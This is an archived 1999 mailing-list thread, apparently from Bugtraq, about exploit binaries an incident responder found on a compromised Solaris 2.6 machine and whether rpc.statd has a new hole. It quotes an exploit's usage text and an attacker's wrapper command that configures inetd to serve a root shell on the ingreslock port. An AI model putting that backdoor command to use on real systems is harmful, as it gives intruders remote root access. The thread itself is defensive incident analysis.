Re: Vulnerability in Solaris 2.6. rpc.statd ?

From: Bob Todd (toddrat_private)
Date: Tue Aug 24 1999 - 11:10:40 PDT

Next message: Josip Rodin: "Re: [Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock"

Previous message: David LeBlanc: "Re: IE 5.0 allows executing programs"
Maybe in reply to: Bob Todd: "Vulnerability in Solaris 2.6. rpc.statd ?"
Next in thread: mb: "Re: Vulnerability in Solaris 2.6. rpc.statd ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I found two binary-only exploits on a hacked machine.  The one of most
interest was "amexp" which when executed without arguments presents
the following:

    Usage: ./amexp address cache command type [port]

    Further help:

        address    -    system address
        cache      -    system hostname
        command    -    execute this command
        type       -    0: Solaris 2.5.1 stock,
                            1: Solaris 2.5.1 patched, 2.6 & 2.7
        port       -    optional port to bypass portmapper

A shell script that was included was "go.amexp" which contained:

./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' >
/tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3

The command is nearly identical to what is used for both tooltalk and
rpc.cmsd attacks

The proper patches were installed and I do not believe that it is the
statd/automountd exploit since
no indirect rpc services execution was attempted.

This incident is closed.



----- Original Message -----
From: Tabor J . Wells <twellsat_private>
To: Bob Todd <toddat_private>
Cc: <BUGTRAQat_private>
Sent: Tuesday, August 24, 1999 1:52 PM
Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ?


> On Sat, Aug 21, 1999 at 12:31:18PM -0400,
> Bob Todd <toddrat_private> is thought to have said:
>
> > While performing an on-site incident response at
> > _______, I found several
> > Solaris-oriented exploit programs including a
> > statd2.6 (others were calendar
> > manager, tooltalk, and lockd?).  Since there is an
> > exploit program for statd on
> >  Solaris 2.6, I could conclude that Solaris 2.6
> > statd is vulnerable to attack.  I
> > have not tried the exploit, but since the machine
> > was probably compromised
> > by one of these programs, the threat seems real!!
>
> And did this server have the statd patch installed (106592-02 on
sparc and
> 106593-02 on x86)? Did it have the various security patches for the
other
> services mention installed as well?
>
> Perhaps the program was part of the exploit which allowed indirect
RPC
> calls with statd that was discussed here (and elsewhere) several
weeks
> back.
>
> I don't think your conclusion is supported given the information you
> provided. Perhaps you could provide more information about the
exploit
> before rushing to claim that there is a new vulnerability.
>
> Tabor
>
> --
>
______________________________________________________________________
__
> Tabor J. Wells
twellsat_private
> Technology Manager
http://www.smarterliving.com
> Smarter Living, Inc.                    It's your time. It's your
money.
>

Next message: Josip Rodin: "Re: [Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock"
Previous message: David LeBlanc: "Re: IE 5.0 allows executing programs"
Maybe in reply to: Bob Todd: "Vulnerability in Solaris 2.6. rpc.statd ?"
Next in thread: mb: "Re: Vulnerability in Solaris 2.6. rpc.statd ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:58:52 PDT